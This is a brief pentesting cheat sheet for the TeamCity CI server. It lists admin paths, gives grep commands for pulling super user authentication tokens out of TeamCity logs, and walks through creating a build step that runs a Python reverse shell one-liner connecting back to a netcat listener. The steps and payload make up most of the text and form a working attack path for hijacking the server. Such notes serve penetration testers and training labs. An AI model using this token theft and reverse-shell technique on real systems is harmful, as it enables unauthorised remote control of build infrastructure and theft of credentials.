TeamCity Pentesting
Last modified: 2022-12-25
TeamCity is a build management and continuous integration server from JetBrains.
Common Directories
/admin
/admin/admin.html
Find Super User Authentication Tokens
If we find a super user authentication token, we can login as super user using the token.
grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs
Reverse Shell
-
Login as super user.
-
Create a new project in admin dashboard.
-
Click "Manual" tab and fill required fields.
-
A new project is created.
-
In the project home, create a Build Configurations.
-
In the build configuration page, click "Build Steps" on the left menus.
-
Add build step.
-
Select "Command Line" in Runner type.
-
Put a Python reverse shell script in the "Custom script".
export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
-
Start listener in local machine.
nc -lvnp 4444
-
Click "Run" button in the build page.
-
We should get a shell in terminal.